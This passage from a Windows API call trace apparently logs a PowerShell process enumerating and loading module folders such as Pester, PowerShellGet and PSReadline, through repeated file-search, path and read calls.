	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.876] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.877] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 0
	[0049.877] FindClose (in: hFindFile=0x1505fab8220 | out: hFindFile=0x1505fab8220) returned 1
	[0049.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d090) returned 1
	[0049.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d050) returned 1
	[0049.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d140) returned 1
	[0049.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0049.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x184c18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38
	[0049.877] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x184c18cde0 | out: lpFindFileData=0x184c18cde0) returned 0x1505fab7260
	[0049.877] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.878] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.890] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 1
	[0049.890] FindNextFileW (in: hFindFile=0x1505fab7260, lpFindFileData=0x184c18ce30 | out: lpFindFileData=0x184c18ce30) returned 0
	[0049.890] FindClose (in: hFindFile=0x1505fab7260 | out: hFindFile=0x1505fab7260) returned 1
	[0049.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d090) returned 1
	[0049.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d050) returned 1
	[0049.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0049.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0049.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d170) returned 1
	[0049.890] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x184c18d250 | out: lpFileInformation=0x184c18d250*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0049.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d130) returned 1
	[0049.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0049.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0049.890] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38
	[0049.890] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x184c18ce40 | out: lpFindFileData=0x184c18ce40) returned 0x1505fab7da0
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.891] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.892] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.892] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.892] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.892] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 1
	[0049.892] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18ce90 | out: lpFindFileData=0x184c18ce90) returned 0
	[0049.892] FindClose (in: hFindFile=0x1505fab7da0 | out: hFindFile=0x1505fab7da0) returned 1
	[0049.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0f0) returned 1
	[0049.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0b0) returned 1
	[0049.892] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff
	[0049.892] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff
	[0049.892] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff
	[0049.892] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff
	[0049.892] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff
	[0049.892] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0049.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.893] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x184c18d3e0 | out: lpFileInformation=0x184c18d3e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0049.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0049.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x184c18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32
	[0049.893] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x184c18cfd0 | out: lpFindFileData=0x184c18cfd0) returned 0x1505fab8700
	[0049.893] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 1
	[0049.893] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 1
	[0049.893] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 0
	[0049.893] FindClose (in: hFindFile=0x1505fab8700 | out: hFindFile=0x1505fab8700) returned 1
	[0049.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.893] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x184c18cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43
	[0049.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d370) returned 1
	[0049.893] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18d450 | out: lpFileInformation=0x184c18d450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1
	[0049.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d330) returned 1
	[0049.894] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43
	[0049.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d110) returned 1
	[0049.894] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x688
	[0049.894] GetFileType (hFile=0x688) returned 0x1
	[0049.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d080) returned 1
	[0049.894] GetFileType (hFile=0x688) returned 0x1
	[0049.894] ReadFile (in: hFile=0x688, lpBuffer=0x150474210a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d1e8, lpOverlapped=0x0 | out: lpBuffer=0x150474210a0*, lpNumberOfBytesRead=0x184c18d1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0049.894] ReadFile (in: hFile=0x688, lpBuffer=0x150474210a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d1e8, lpOverlapped=0x0 | out: lpBuffer=0x150474210a0*, lpNumberOfBytesRead=0x184c18d1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0049.894] ReadFile (in: hFile=0x688, lpBuffer=0x150474210a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d1e8, lpOverlapped=0x0 | out: lpBuffer=0x150474210a0*, lpNumberOfBytesRead=0x184c18d1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0049.894] ReadFile (in: hFile=0x688, lpBuffer=0x150474210a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d1e8, lpOverlapped=0x0 | out: lpBuffer=0x150474210a0*, lpNumberOfBytesRead=0x184c18d1e8*=0x5e5, lpOverlapped=0x0) returned 1
	[0049.894] ReadFile (in: hFile=0x688, lpBuffer=0x150474205c5, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x184c18d1e8, lpOverlapped=0x0 | out: lpBuffer=0x150474205c5*, lpNumberOfBytesRead=0x184c18d1e8*=0x0, lpOverlapped=0x0) returned 1
	[0049.895] ReadFile (in: hFile=0x688, lpBuffer=0x150474210a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d1e8, lpOverlapped=0x0 | out: lpBuffer=0x150474210a0*, lpNumberOfBytesRead=0x184c18d1e8*=0x0, lpOverlapped=0x0) returned 1
	[0049.895] CloseHandle (hObject=0x688) returned 1
	[0049.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d140) returned 1
	[0049.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d090) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d050) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d140) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d090) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d050) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d170) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d130) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0f0) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0b0) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d370) returned 1
	[0049.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d330) returned 1
	[0049.900] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53
	[0049.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d110) returned 1
	[0049.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d080) returned 1
	[0049.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d140) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d090) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d050) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d140) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d090) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d050) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18cfb0) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cf00) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cec0) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18cfb0) returned 1
	[0049.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cf00) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cec0) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18cfe0) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cfa0) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d010) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cf60) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cf20) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d170) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d130) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0f0) returned 1
	[0049.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0b0) returned 1
	[0049.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d370) returned 1
	[0049.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d330) returned 1
	[0049.904] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x184c18cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49
	[0049.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d110) returned 1
	[0049.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d080) returned 1
	[0049.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d490) returned 1
	[0049.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d450) returned 1
	[0049.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d4c0) returned 1
	[0049.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d410) returned 1
	[0049.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3d0) returned 1
	[0049.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d460) returned 1
	[0049.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3b0) returned 1
	[0049.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d370) returned 1
	[0049.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d460) returned 1
	[0049.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3b0) returned 1
	[0049.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d370) returned 1
	[0049.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.918] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.918] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.918] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.918] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.918] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.918] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 0
	[0049.918] FindClose (in: hFindFile=0x1505fab7f80 | out: hFindFile=0x1505fab7f80) returned 1
	[0049.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x184c18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44
	[0049.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x184c18cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45
	[0049.919] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x184c18cf70 | out: lpFindFileData=0x184c18cf70) returned 0x1505fab8040
	[0049.919] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.919] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.919] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
